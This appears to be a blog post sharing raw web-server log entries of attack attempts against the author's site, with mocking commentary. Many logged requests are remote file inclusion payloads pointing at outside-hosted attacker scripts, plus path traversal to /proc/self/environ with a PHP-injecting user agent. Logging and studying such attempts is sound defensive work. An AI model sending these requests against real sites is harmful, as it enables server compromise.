Server Logs

Some interesting Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Blind SQL Injections, Remote Code Execution, and Remote Code Injection attempts pulled from a number of server httpd logs. This page should result in some entertaining data...

www.ayj.ca - buggsbunny??? WTF?

Unique breed right here. This guy is probably abused, even as an adult. Aaaww, poor guy.

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET /various-tools/server-logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"

140.109.103.221 - "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 50336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

Yet Another Idiot

These people don't even research their targets. Had the malicious dick visited the target page, he hopefully would have realized the post is about a vulnerability, not a page vulnerable to a completely different content publishing platform...

211.49.99.7 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

211.49.99.7 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

211.49.99.7 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

Wrong Operating System - Nice Try...

66.218.148.129 - "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 5328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

66.218.148.129 - "GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 5328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

Java/1.6.0_13@24.185.176.146

24.185.176.146 - "GET /search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /extern_js/f/CgJlbhICdXMgACswCjgVLCswDjgFLCswGDgDLCswJTjJiAEsKzAmOAQsKzAnOAAs/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/ads/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /extern_js/f/CgJlbhICdXMgACswCjgVLCswDjgFLCswGDgDLCswJTjJiAEsKzAmOAQsKzAnOAAs/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/ads/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC):

92.249.186.39 - "GET /ashop/catalogue.php?cat=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18036 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

92.249.186.39 - "GET /ashop/catalogue.php?cat=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18036 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /wordpress-users-beware-new-vulnerability-release//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /wordpress-users-beware-new-vulnerability-release//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

203.246.75.102 - "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18284 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

203.246.75.102 - "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18284 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.53.85.154 - "GET /another-wordpress-plugin-vulnerability-wp-forum-174/search.php?sid= HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in/errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in//errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 67796 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in/errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in//errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 67796 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.222.5.120 - "GET /category/make-money//errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.222.5.120 - "GET /category/make-money/errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 18447 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /find-r57-and-c99-shells-hidden-inside-php-and-txt-files/bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 68124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /automated-adsense-privacy-policy-deployment-guide/bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 68124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

More Shipments From Fail Boat:

80.250.162.2 - "GET //advanced1.php?pluginpath[0]=http://www.europeytu.com/.httpaccess/maxid.txt???? HTTP/1.1" 301 0 "-" "libwww-perl/5.803"

80.250.162.2 - "GET /gmail-sorry-you-account-has-been-disabled//advanced1.php?pluginpath[0]=http://www.europeytu.com/.httpaccess/maxid.txt???? HTTP/1.1" 301 0 "-" "libwww-perl/5.803"

67.129.133.11 "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

67.129.133.11 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

67.129.133.11 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

89.111.173.72 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

89.111.173.72 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

212.227.64.146 - "GET /header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"

212.227.64.146 - "GET /howto-run-multiple-poor-mans-bans-sites...-1-wordpress-installation/header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"

212.227.64.146 - "GET /howto-run-multiple-poor-mans-ban...1-wordpress-installation/header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"

Click Here to Submit a Comment

Name (required)

E-mail (required - never shown publicly)

URI

Your Comment:

Comments are moderated prior to showing up. If your comment does not show up immediately, please do not attempt to resubmit. If you're redirected to the original post after pressing "Add Comment", your comment was successfully entered into the moderation queue.
Notify me of followup comments via e-mail

Technology Made Simple

www.ayj.ca - buggsbunny??? WTF?

Yet Another Idiot

Wrong Operating System - Nice Try...

Java/1.6.0_13@24.185.176.146

Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC):

More Shipments From Fail Boat:

Permalink / Last Modified:

Support Nullamatix.com:

0 Comments

Leave a Comment

Trackback Responses to This Post:

Sponsored Links

Recent Posts

Categories

Links

Top Commentators

Recent Comments

Got Root? I do.

Random Posts